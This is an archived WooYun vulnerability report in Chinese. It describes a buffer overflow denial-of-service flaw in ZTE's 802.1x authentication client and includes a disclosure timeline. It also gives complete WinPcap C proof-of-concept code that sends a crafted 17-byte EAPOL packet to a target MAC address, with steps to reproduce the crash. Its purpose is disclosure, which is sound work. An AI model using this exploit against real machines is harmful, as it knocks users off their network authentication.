乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-03-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-06-09: 厂商已经主动忽略漏洞,细节向公众公开
ZTE中兴802.1x认证客户端在接受数据时,未做有效性检验,导致缓冲区溢出,产生拒绝服务漏洞
pdata指向接受到的数据,data_len为数据长度,当数据长度为17时,传给sub_40EFD0的第三个参数为0xFFFFFFFF构造其余数据,在sub_40E340处触发漏洞
poc代码如下:
#include <pcap.h>#pragma comment( lib , "wpcap.lib" )int _tmain(int argc, _TCHAR* argv[]){ pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; u_char packet[3000]; pcap_if_t *alldevs; /* Check the validity of the command line */ if(pcap_findalldevs(&alldevs, errbuf) == -1) { fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); exit(1); } pcap_if_t *d; int i = 0; /* Print the list */ for(d=alldevs; d; d=d->next) { printf("%d. %s", ++i, d->name); if (d->description) printf(" (%s)\n", d->description); else printf(" (No description available)\n"); } /* 选择相应网卡*/ if ((fp = pcap_open_live(alldevs->name, // name of the device 65536, // portion of the packet to capture. It doesn't matter in this case 1, // promiscuous mode (nonzero means promiscuous) 1000, // read timeout errbuf // error buffer )) == NULL) { fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]); return 2; } memset( packet , 0 , 1000 ); /* 目标机器mac地址 */ packet[0]= 0x00; packet[1]= 0x0C; packet[2]= 0x29; packet[3]= 0x0F; packet[4]= 0x63; packet[5]= 0xDD; /* set mac source to 2:2:2:2:2:2 */ packet[6]= 2; packet[7]= 2; packet[8]= 2; packet[9]= 2; packet[10]= 2; packet[11]= 2; /* 协议头 */ packet[12] = 0x88; packet[13] = 0x8e; packet[14] = 0x01; packet[15] = 0x00; packet[0x12] = 0x01;//此处必须为0x0A packet[22] = 0x04; packet[23] = 0x10; /* Send down the packet */ if (pcap_sendpacket(fp, // Adapter packet, // buffer with the packet 100 // size ) != 0) { fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp)); return 3; } Sleep( 100 ); if (pcap_sendpacket(fp, // Adapter packet, // buffer with the packet 17 // size ) != 0) { fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp)); return 3; } pcap_close(fp); return 0; return 0;}
打开程序
点击连接,程序开始接受数据包
运行poc代码,此处需要保证第二个数据包的长度为17字节
未能联系到厂商或者厂商积极拒绝